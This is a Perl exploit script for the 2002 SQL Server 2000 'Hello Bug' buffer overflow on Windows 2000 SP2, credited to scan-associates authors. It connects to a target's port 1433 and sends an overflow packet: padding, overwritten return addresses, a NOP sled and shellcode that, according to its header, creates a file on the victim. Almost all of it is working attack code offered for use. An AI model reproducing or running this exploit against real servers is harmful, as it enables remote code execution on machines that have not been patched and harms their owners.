#!/usr/local/bin/perl

#-----------------------------------------------------------
#	Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
# 	by sk@scan-associates.net & spoonfork
#
# Bug found by
#	Dave Aitel 
#	http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to: 	scan clan, especially to tynon, pokleyzz, and wyse
#		Alphaque and L33tdawg.
#		and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
#	http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
use Socket;


$connect_host = $ARGV[0];

if (!defined($connect_host)) {
	print "Usage: $0 <target>\n";
	exit 255;
}

$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

$bug =  "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .=  "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .=  "\x10\x00\x00\x00";
$bug2 =  "A" x 528;
$bug .=  $bug2;
$bug .=  "\x6b\xd0\xc0\x40";
$bug .=  "AAAA";
$bug .=  "\x83\x91\xe8\x77";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x0b\x03\x0f\x02";
$bug .=  "DDDD";
$bug .=  "\x50\x1e\xd0\x42"; 
$bug .=  "\x50\x1e\xd0\x42"; 
$bug3 =  "\x90" x 88;
$bug .=  $bug3;
$bug .=  "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .=  "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .=  "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .=  "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";

$bug .=  "\x00\x24\x01\x00\x00";

print SOCKET $bug;